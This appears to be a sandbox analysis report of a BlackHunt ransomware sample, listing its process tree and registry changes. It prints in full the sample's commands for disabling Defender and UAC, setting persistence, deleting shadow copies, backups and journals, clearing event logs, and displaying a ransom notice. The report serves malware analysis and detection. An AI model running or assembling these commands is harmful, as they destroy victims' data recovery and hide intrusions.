a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 115 PID 2228 wrote to memory of 2624 2228 cmd.exe 113 PID 2228 wrote to memory of 2624 2228 cmd.exe 113 PID 5044 wrote to memory of 1848 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 127 PID 5044 wrote to memory of 1848 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 127 PID 5044 wrote to memory of 2708 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 126 PID 5044 wrote to memory of 2708 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 126 PID 4648 wrote to memory of 3844 4648 Conhost.exe 125 PID 4648 wrote to memory of 3844 4648 Conhost.exe 125 PID 5044 wrote to memory of 1684 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 124 PID 5044 wrote to memory of 1684 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 124 PID 5044 wrote to memory of 3040 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 121 PID 5044 wrote to memory of 3040 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 121 PID 5044 wrote to memory of 2628 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 128 PID 5044 wrote to memory of 2628 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 128 PID 5044 wrote to memory of 4472 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 132 PID 5044 wrote to memory of 4472 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 132 PID 5044 wrote to memory of 1068 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 131 PID 5044 wrote to memory of 1068 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 131 PID 5044 wrote to memory of 4372 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 130 PID 5044 wrote to memory of 4372 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 130 PID 5044 wrote to memory of 3824 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 136 PID 5044 wrote to memory of 3824 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 136 PID 5044 wrote to memory of 4528 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 138 PID 5044 wrote to memory of 4528 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 138 PID 2416 wrote to memory of 3888 2416 cmd.exe 139 PID 2416 wrote to memory of 3888 2416 cmd.exe 139 PID 2356 wrote to memory of 2656 2356 cmd.exe 142 PID 5044 wrote to memory of 4592 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 141 PID 2356 wrote to memory of 2656 2356 cmd.exe 142 PID 5044 wrote to memory of 4592 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 141 PID 5044 wrote to memory of 624 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 144 PID 5044 wrote to memory of 624 5044 a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe 144 PID 3036 wrote to memory of 1860 3036 cmd.exe 146 PID 3036 wrote to memory of 1860 3036 cmd.exe 146 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe"C:\Users\Admin\AppData\Local\Temp\a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:5044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:4828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:3644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2416
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:4696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1068
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3824
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4528
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:5064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2944
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:4828
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4708
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe" /F2⤵PID:3560
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe" /F3⤵
- Creates scheduled task(s)
PID:7208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2652
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3260
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:9900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1840
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:8780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1920
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:9268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3884
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4196
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2660
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3752
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3120
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:11440
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:7940
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:6356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5392
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:6260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10876
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:6224
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:12576
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:12548
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11084
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:14516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1964
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:11412
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4640
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5260
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:12180
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:11112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:11564
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:11048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:12060
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:11176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:12072
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:11156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1120
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:11388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:11216
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:11416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:11624
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:11068
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:11332
-
-
-
